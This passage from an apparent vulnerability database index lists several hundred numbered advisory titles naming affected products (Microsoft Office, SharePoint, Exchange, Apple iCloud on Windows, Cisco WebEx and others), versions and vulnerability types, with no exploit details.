CU15/2019 CU3/2019 CU4 cross site scripting [151168] Microsoft SharePoint Enterprise Server cross site scripting [151167] Microsoft SharePoint Enterprise Server cross site scripting [151166] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [151165] Microsoft SharePoint Enterprise Server cross site scripting [151162] Microsoft Visual Studio up to 2017 Version 15.9/2019 version 16.4 weak encryption [151130] Microsoft Azure DevOps Server 2019 Update 1.1 Pipeline Job Token privilege escalation [151117] Microsoft Business Productivity Servers cross site scripting [151114] Microsoft Visual Studio up to 2019 Version 16.4 Extension Installer Service privilege escalation [151093] Microsoft Azure DevOps Server/Team Foundation Server Pipeline Job Token privilege escalation [151092] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [151090] Microsoft IIS privilege escalation [151089] Microsoft Office 365 ProPlus/2019 for Mac Word memory corruption [151088] Microsoft Office 2016 for Mac/2019/Online Server Word memory corruption [151087] Microsoft Office 365 ProPlus/2016 for Mac Word memory corruption [151086] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 Word memory corruption [150860] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150859] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150766] Apple iCloud on Windows CoreCrypto denial of service [150765] Apple iCloud on Windows CoreCrypto denial of service [150715] PHP up to 7.3.14/7.4.2 on Windows PHAR File information disclosure [150694] Apple iCloud up to 10.9.1 on Windows WebKit Page Loading memory corruption [150692] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150691] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150690] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150689] Apple iCloud up to 10.9.1 on Windows WebKit Universal cross site scripting [150688] Apple iCloud up to 10.9.1 on Windows libxml2 privilege escalation [150687] Apple iCloud up to 10.9.1 on Windows ImageIO information disclosure [150614] Apple iCloud up to 7.16 on Windows WebKit Page Loading DOM-Based memory corruption [150613] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150612] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150611] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150610] Apple iCloud up to 7.16 on Windows WebKit Universal cross site scripting [150609] Apple iCloud up to 7.16 on Windows libxml2 privilege escalation [150608] Apple iCloud up to 7.16 on Windows ImageIO information disclosure [150052] IBM Cloud CLI up to 0.16.1 Windows Installer weak authentication [149969] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [149968] Microsoft Office up to 2019 Excel memory corruption [149918] Microsoft Office 365 ProPlus OLicenseHeartbeat privilege escalation [149917] Microsoft Office up to 2019 Security Feature privilege escalation [149916] Microsoft Office Online Server privilege escalation [149915] Microsoft SharePoint Enterprise Server 2013 P1/2016/2019 cross site scripting [149914] Microsoft Exchange Server 2013 CU23/2016 CU14/2016 CU15/2019 CU3/2019 CU4 Exchange Web Services privilege escalation [149507] CPython up to 3.8.1 on Windows 7 Dependency Load api-ms-win-core-path-l1-1-0.dll privilege escalation [149361] Cisco Webex Teams Client on Windows denial of service [149313] Microsoft Outlook on Android Email privilege escalation [148624] Microsoft .NET Framework up to 4.8 privilege escalation [148623] Microsoft .NET Core/.NET Framework Source Markup File privilege escalation [148622] Microsoft .NET Core/.NET Framework Source Markup File privilege escalation [148619] Microsoft Office 365 ProPlus Excel memory corruption [148618] Microsoft Office up to 2019 for Mac memory corruption [148617] Microsoft Excel up to 2019 for Mac memory corruption [148616] Microsoft Excel up to 2019 for Mac memory corruption [148615] Microsoft Office Online Server privilege escalation [148306] cURL up to 7.67.x on Windows File privilege escalation [147595] PHP up to 7.3.12 on Windows Header mail memory corruption [147591] PHP up to 7.2.25/7.3.12 on Windows Filename link memory corruption [147443] Apple iCloud 7.13/10.6 on Windows memory corruption [147439] Apple iCloud 7.13/10.6 on Windows Text File information disclosure [147436] Apple iCloud 7.13/10.6 on Windows memory corruption [147434] Apple iCloud 7.13/10.6 on Windows memory corruption [147432] Apple iCloud 7.13/10.6 on Windows memory corruption [147430] Apple iCloud 7.13/10.6 on Windows State Management Universal cross site scripting [147427] Apple iCloud 7.13/10.6 on Windows memory corruption [147425] Apple iClouds 7.13/10.6 on Windows State Management Universal cross site scripting [147033] Microsoft Visual Studio Git privilege escalation [147032] Microsoft Visual Studio Git privilege escalation [147031] Microsoft Visual Studio Git privilege escalation [147030] Microsoft Visual Studio Git privilege escalation [147029] Microsoft Visual Studio Git privilege escalation [147028] Microsoft Visual Studio Git privilege escalation [146927] Microsoft Skype for Business Server 2019 CU2 privilege escalation [146922] Microsoft Authentication Library up to 0.3.1-Alpha on Android information disclosure [146920] Microsoft Visual Studio 2019 Redirect [146866] Microsoft Office up to 2019 Excel information disclosure [146865] Microsoft Office up to 2019 Access information disclosure [146864] Microsoft Office up to 2019 PowerPoint privilege escalation [146863] Microsoft Office up to 2019 Word privilege escalation [146861] Microsoft Office up to 2019 Access information disclosure [146860] Microsoft Power BI Report Server cross site scripting [146853] Lenovo Energy Management Driver up to 15.11 on Windows 10 privilege escalation [146803] Microsoft Visual Studio 2008 Express XML External Entity [146800] Microsoft Excel XML Import XML External Entity [146332] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [146331] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [145418] Microsoft Office 2016/2019 on Mac Excel privilege escalation [145401] Microsoft Office 365 ProPlus/2019 ClickToRun Security Feature privilege escalation [145400] Microsoft Office up to 2019 Excel memory corruption [145399] Microsoft Office Online Server privilege escalation [145398] Microsoft Office up to 2019 Excel information disclosure [145397] Microsoft Office Online Server privilege escalation [145396] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Upload privilege escalation [145395] Microsoft SharePoint Server 2019 Security Feature privilege escalation [145385] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.3 Archive privilege escalation [145368] Microsoft Office up to 2019 information disclosure [145347] Microsoft Azure Stack User Portal weak authentication [145343] Microsoft Exchange Server 2013 CU23/2016 CU13/2016 CU14/2019 CU2/2019 CU3 Metadata privilege escalation [144649] Apple iCloud up to 10.7 on Windows WebKit Process Model memory corruption [144648] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144647] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144646] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144645] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144644] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144643] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144642] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144641] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144640] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144639] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144638] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144637] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144636] Apple iCloud up to 10.7 on Windows WebKit Universal cross site scripting [144635] Apple iCloud up to 10.7 on Windows libxslt memory corruption [144633] Apple iCloud up to 7.14 on Windows WebKit Process Model memory corruption [144632] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144631] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144630] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144629] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144628] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144627] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144626] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144625] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144624] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144412] PostgreSQL up to 9.4.23/9.5.18/9.6.14/10.9/11.4 on Windows Installer privilege escalation [143123] Microsoft SQL Server Management Studio 18.3.1 Permission privilege escalation [143095] Microsoft Excel up to 2019 for Mac memory corruption [143094] Microsoft SharePoint Foundation Impersonation privilege escalation [143093] Microsoft cross site scripting [143092] Microsoft cross site scripting [143091] Microsoft Excel up to 2019 for Mac memory corruption [143078] Microsoft SQL Server Management Studio 18.3/18.3.1 Permission privilege escalation [143074] Microsoft cross site scripting [143070] Microsoft Azure App Service Sandbox memory corruption [141639] Microsoft SharePoint Foundation 2013 SP1 cross site request forgery [141638] Microsoft Team Foundation Server/Azure DevOps Server cross site scripting [141633] Microsoft Excel up to 2019 memory corruption [141613] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 Outlook Web App privilege escalation [141612] Microsoft Yammer on Android Security Feature Policy privilege escalation [141611] Microsoft Office up to 2019 Security Feature privilege escalation [141610] Microsoft Excel up to 2019 information disclosure [141609] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [141608] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site request forgery [141607] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [141589] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 memory corruption [141583] Microsoft Lync Server 2013 Conference information disclosure [141582] Microsoft .NET Framework up to 4.8 Common Language Runtime privilege escalation [141576] Microsoft Team Foundation Server/Azure DevOps Server privilege escalation [141566] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 API privilege escalation [141565] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 API privilege escalation [141564] Microsoft SharePoint Enterprise Server 2010 SP1/2013 SP1/2016/2019 Markup privilege escalation [141382] LibreOffice up to 6.2.6/6.3.2 on Windows LibreLogo privilege escalation [141274] Cisco Webex Teams Client on Windows privilege escalation [141188] MongoDB up to 3.4.21/3.6.13/4.0.10 on Windows OpenSSL privilege escalation [140144] Tenable Nessus up to 8.5.2 on Windows privilege escalation [140066] Microsoft NuGet/ADAL.NET Azure Active Directory privilege escalation [139961] Microsoft Outlook on iOS Email privilege escalation [139957] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [139956] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Session Object information disclosure [139929] Microsoft Forefront Endpoint Protection MpSigStub.exe privilege escalation [139904] Microsoft Word 365 ProPlus/2016/2019 memory corruption [139903] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 privilege escalation [139902] Microsoft Word up to 2019 memory corruption [139901] Microsoft Outlook up to 2019 memory corruption [139877] Microsoft Outlook up to 2019 memory corruption [139664] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139663] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139662] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139661] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139660] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139659] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139587] NVIDIA Windows GPU Display Driver DirectX Driver memory corruption [139586] NVIDIA Windows GPU Display Driver DirectX Driver memory corruption [138937] Microsoft Outlook on Android Message Parser privilege escalation [138718] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138717] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138716] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138715] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138714] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138713] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138712] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138711] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138710] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138709] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138708] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138707] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138706] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138705] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138704] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138703] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138702] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138701] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138700] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138699] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138698] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138697] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal information disclosure [138696] Apple iCloud up to 7.12/10.5 on Windows libxslt privilege escalation [137589] Microsoft Exchange Server 2013 CU23/2016 CU12/2016 CU13/2019 CU1/2019 CU2 cross site scripting [137588] Microsoft Exchange Server 2010 SP3/2013 CU23/2016 CU12/2016 CU13 Web Services privilege escalation [137587] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [137572] Microsoft Excel 365 ProPlus/2019 information disclosure [137571] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137570] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137569] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 JavaScript privilege escalation [137551] Microsoft Exchange Server Display Name Invisible information disclosure [137550] Microsoft .NET Framework up to 4.8 Common Object Runtime Library Data Processing Error [137548] Microsoft Visual Studio XML Data information disclosure [137547] Microsoft Visual Studio File Permission privilege escalation [137546] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [137542] Microsoft SQL Server 2014 SP2/2016 SP1/2017 privilege escalation [137536] Microsoft Azure Automation privilege escalation [137526] Microsoft Azure DevOps Server/Team Foundation Server File privilege escalation [137522] Microsoft .NET Framework up to 4.8 WCF/WIF SAML Token Impersonation weak authentication [137521] Microsoft .NET Framework up to 4.8 Source Markup privilege escalation [136414] Microsoft Azure DevOps Server 2019 cross site request forgery [136333] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136332] Microsoft Office 365 ProPlus/2016/2019 Word memory corruption [136331] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [136330] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136329] Microsoft SharePoint Server 2016/2019 cross site scripting [136328] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [136327] Microsoft Lync Server 2010/2013 privilege escalation [136294] Microsoft IIS Request Filter Data Processing Error [135806] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135805] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135804] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135803] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135802] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135801] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135800] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135799] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135798] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135797] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135796] Apple iCloud up to 7.11 on Windows WebKit privilege escalation [135795] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135794] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135793] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135792] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135791] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135790] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135789] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135788] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135787] Apple iCloud up to 7.11 on Windows WebKit memory corruption [135786] Apple iCloud up to 7.11 on Windows WebKit information disclosure [135785] Apple iCloud up to 7.11 on Windows SQLite memory corruption [135784] Apple iCloud up to 7.11 on Windows SQLite privilege escalation [135783] Apple iCloud up to 7.11 on Windows SQLite sql injection [135782] Apple iCloud up to 7.11 on Windows SQLite privilege escalation [135307] Citrix Workspace App on Windows Access Control privilege escalation [134754] Microsoft Azure DevOps Server/Team Foundation Server information disclosure [134753] Microsoft Dynamics 365/Dynamics CRM Attachment 7PK Security Features [134752] Microsoft Azure Active Directory Connect 1.3.20.0 PowerShell privilege escalation [134749] Microsoft .NET Framework/.NET Core Data Processing Error [134748] Microsoft .NET Framework/.NET Core Data Processing Error [134747] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [134745] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [134743] Microsoft SharePoint Server 2013 SP1/2016 privilege escalation [134742] Microsoft SharePoint Enterprise Server 2016/2019 privilege escalation [134741] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [134740] Microsoft SharePoint Enterprise Server 2013 SP1/2016 7PK Security Features [134739] Microsoft SharePoint Foundation 2010 SP2/2013 SP2 privilege escalation [134738] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134737] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [134736] Microsoft Office 2010 SP2 Access Connectivity Engine Data Processing Error [134735] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134734] Microsoft Office up to 2019 Access Connectivity Engine Data Processing Error [134730] Microsoft Skype 8.35 on Android Bluetooth Listening information disclosure [134708] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [134707] Microsoft .NET Framework up to 4.8 memory corruption [134705] Microsoft .NET Framework/.NET Core Regex privilege escalation [134704] Microsoft SQL Server 2017 Analysis Services information disclosure [134697] Microsoft Office/Word 365 ProPlus/2016/2019 memory corruption [134672] Facebook WhatsApp Messenger on Android/iOS/Windows Phone/Tizen VoIP Stack memory corruption [134594] Google Go up to 1.12.5 on Windows Process privilege escalation [133645] Oracle Java SE 8u202 Windows DLL privilege escalation [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE privilege escalation [133235] Microsoft Azure DevOps Server 2019 privilege escalation [133232] Microsoft Azure DevOps Server 2019 cross site scripting [133231] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133230] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133229] Microsoft Azure DevOps Server 2019 privilege escalation [133228] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133227] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133226] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [133224] Microsoft Exchange Server 2013 CU22/2016 CU11/2016 CU12/2019/2019 CU1 Outlook Web Access privilege escalation [133223] Microsoft Azure DevOps Server 2019 Content Security Policy privilege escalation [133206] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [133205] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [133204] Microsoft Office/Excel up to 2019 memory corruption [133203] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133202] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133201] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133200] Microsoft Office up to 2019 Access Connectivity Engine privilege escalation [133199] Microsoft Office 2010 SP2 Access Connectivity Engine privilege escalation [133198] Microsoft Exchange Server up to 2019 CU1 Outlook Web Access Data Processing Error [133184] Microsoft Office 365 ProPlus/2016 for Mac/2019 Graphics Component memory corruption [133181] Microsoft Office/Excel/PowerPoint up to 2019 URL Data Processing Error [133142] Microsoft Azure Linux Guest Agent Swap File information disclosure [132958] Apple iCloud up to 7.6 on Windows memory corruption [132948] Apple iCloud up to 7.6 on Windows denial of service [132943] Apple iCloud up to 7.6 on Windows memory corruption [132939] Apple iCloud up to 7.6 on Windows memory corruption [132934] Apple iCloud up to 7.6 on Windows memory corruption [132928] Apple iCloud up to 7.6 on Windows memory corruption [132923] Apple iCloud up to 7.6 on Windows URL cross site scripting [132902] Apple iCloud up to 7.6 on Windows memory corruption [132898] Apple iCloud up to 7.6 on Windows memory corruption [132892] Apple iCloud up to 7.6 on Windows IFRAME 7PK Security Features [132888] Apple iCloud up to 7.6 on Windows Memory Management Routine memory corruption [132884] Apple iCloud up to 7.6 on Windows Memory Management Routine memory corruption [132880] Apple iCloud up to 7.6 on Windows State Management memory corruption [132876] Apple iCloud up to 7.6 on Windows memory corruption [132872] Apple iCloud up to 7.6 on Windows memory corruption [132866] Apple iCloud up to 7.6 on Windows memory corruption [132862] Apple iCloud up to 7.6 on Windows information disclosure [132858] Apple iCloud up to 7.6 on Windows URL cross site scripting [132853] Apple iCloud up to 7.6 on Windows memory corruption [132847] Apple iCloud up to 7.6 on Windows memory corruption [132842] Apple iCloud up to 7.6 on Windows memory corruption [132838] Apple iCloud up to 7.6 on Windows memory corruption [132833] Apple iCloud up to 7.3 on Windows memory corruption [132416] Apple iCloud up to 7.10 on Windows WebKit Universal cross site scripting [132415] Apple iCloud up to 7.10 on Windows WebKit Memory privilege escalation [132414] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132413] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132412] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132411] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132410] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132409] Apple iCloud up to 7.10 on Windows WebKit information disclosure [132408] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132407] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132406] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132405] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132404] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132403] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132402] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132401] Apple iCloud up to 7.10 on Windows WebKit memory corruption [132400] Apple iCloud up to 7.10 on Windows WebKit privilege escalation [132398] Apple iCloud up to 7.10 on Windows CoreCrypto memory corruption [131687] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 3.2/2018 Updated 1.2 cross site scripting [131684] Microsoft Visual Studio 2017 Version 15.9 C++ Redistributable Installer privilege escalation [131682] Microsoft Lync Server/Skype for Business privilege escalation [131675] Microsoft SharePoint 2013 SP1/2016 cross site scripting [131662] Microsoft Visual Studio on Mac Package Manager privilege escalation [131656] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [131529] Google Go up to 1.12 on Windows DLL Loader LoadLibrary privilege escalation [131334] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131333] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131332] Microsoft Java SDK for Azure IoT Log information disclosure [131331] Microsoft Java SDK for Azure IoT Key Generation weak encryption [131330] Microsoft Exchange Server 2010 SP3 UR26/2013 CU22/2016 CU12/2019 CU1 privilege escalation [131329] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [130951] FeiFeiCms 4.0.181010 on Windows index.php directory traversal [130832] Microsoft 2013 SP1 privilege escalation [130829] Microsoft Visual Studio Code privilege escalation [130828] Microsoft Exchange Server 2010 SP3/2013 CU22/2016 CU12/2019 CU1 EWS privilege escalation [130826] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [130825] Microsoft Office up to 2019 Connectivity Engine memory corruption [130824] Microsoft Office up to 2019 Connectivity Engine memory corruption [130823] Microsoft Office up to 2019 Connectivity Engine memory corruption [130822] Microsoft Office up to 2019 Connectivity Engine memory corruption [130821] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [130815] Microsoft .NET Framework up to 4.7.2 URL privilege escalation [130795] Microsoft .NET Framework up to 4.7.2 Source Markup memory corruption [130785] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Security Feature Phishing 7PK Security Features [130777] Microsoft SharePoint Server Application Package privilege escalation [130351] idreamsoft iCMS 7.0.13 on Windows editor.admincp.php directory traversal [130220] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130219] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130218] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130217] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130216] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption [130097] Apple iCloud up to 7.9 on Windows WebKit Universal cross site scripting [130096] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130095] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130094] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130093] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130092] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130091] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130090] Apple iCloud up to 7.9 on Windows WebKit memory corruption [130089] Apple iCloud up to 7.9 on Windows WebKit privilege escalation [130088] Apple iCloud up to 7.9 on Windows SQLite memory corruption [130087] Apple iCloud up to 7.9 on Windows SQLite sql injection [130086] Apple iCloud up to 7.9 on Windows SQLite memory corruption [129847] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 1.2/2018 Update 3.2 information disclosure [129846] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [129845] Microsoft Skype for Business 2015 CU 8 privilege escalation [129835] GE Voluson S8 Windows Operating System Patches privilege escalation [129133] Apple iCloud up to 7.3 on Windows privilege escalation [129128] Apple iCloud up to 7.3 on Windows Reachable Assertion [129119] Apple iCloud up to 7.3 on Windows privilege escalation [129114] Apple iCloud up to 7.3 on Windows privilege escalation [129109] Apple iCloud up to 7.3 on Windows privilege escalation [129104] Apple iCloud up to 7.4 on Windows information disclosure [129048] Apple iCloud up to 7.2 on Windows memory corruption [128765] Microsoft Visual Studio 2017 Version 15.9 C++ Construct memory corruption [128764] Microsoft Exchange Server 2010 SP3/2013 CU21/2016 CU10/2016 CU11/2019 PowerShell API information disclosure [128763] Microsoft Exchange Server 2016 CU10/2016 CU11/2019 memory corruption [128762] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 Word privilege escalation [128746] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [128745] Microsoft Office up to 2019 Word Macro information disclosure [128744] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128743] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [128741] Microsoft SharePoint Enterprise Server 2016 cross site scripting [128740] Microsoft SharePoint Enterprise Server 2013 SP1 cross site scripting [128734] Microsoft .NET Framework up to 4.7.2 CORS Filter information disclosure [128732] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 MSHTML Engine privilege escalation [128729] Microsoft Visual Studio 2010 SP1/2012 Update 5 vscontent File information disclosure [128605] WhatsApp Messenger up to 2.18 on Android/iOS/Windows Phone RTP Packet memory corruption [128112] Advantech WebAccess SCADA 8.3.2 on Windows 2008 privilege escalation [127991] IBM DB2 11.1 on Linux/Unix/Windows privilege escalation [127925] Microsoft SharePoint Enterprise Server 2016 cross site scripting [127883] Microsoft Azure Pack Rollup 13.1 cross site scripting [127825] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 privilege escalation [127824] Microsoft Excel up to 2019 information disclosure [127819] Microsoft Exchange Server 2016 CU10/2016 CU11 Profile Data Data Processing Error [127817] Microsoft Excel up to 2019 information disclosure [127814] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 Search information disclosure [127813] Microsoft .NET Framework up to 4.7.2 privilege escalation [127809] Microsoft PowerPoint 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [127806] Microsoft Outlook up to 2019 memory corruption [127805] Microsoft Excel up to 2019 memory corruption [127804] Microsoft Excel up to 2019 memory corruption [127800] Microsoft .NET Framework up to 4.7.2 privilege escalation [127634] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127633] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127632] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127631] Apple iCloud up to 7.8.1 on Windows WebK it memory corruption [127630] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127629] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption [127628] Apple iCloud up to 7.8.1 on Windows Safari privilege escalation [127627] Apple iCloud up to 7.8.1 on Windows Safari Address privilege escalation [127609] Apple macOS up to 10.14.1 WindowServer memory corruption [127608] Apple macOS up to 10.14.1 WindowServer memory corruption [127436] HPE Intelligent Management Center up to 7.2 on Windows dbman.exe memory corruption [127047] PHP up to 7.1.24 on Windows com_safearray_proxy ext/standard/var.c denial of service [126938] Microsoft Team Foundation Server 2018 Update 1.1/2018 Update 3 privilege escalation [126794] Microsoft Team Foundation Server cross site scripting [126793] Microsoft Azure App Service on Azure Stack cross site scripting [126754] Microsoft Skype for Business/Lync Server 2013 SP1/2016 Emoji privilege escalation [126749] Microsoft Exchange Server 2010/2013/2016/2019 privilege escalation [126748] Microsoft Office 365 ProPlus/2019 Outlook Message information disclosure [126747] Microsoft SharePoint Enterprise Server 2013 SP1 Folder information disclosure [126746] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126745] Microsoft Project 2010 SP2/2013 SP1/2016 memory corruption [126744] Microsoft Office up to 2019 Word memory corruption [126743] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126734] Microsoft Office 365 ProPlus/2019 information disclosure [126728] Microsoft Office/SharePoint 2010 SP2 Word memory corruption [126727] Microsoft 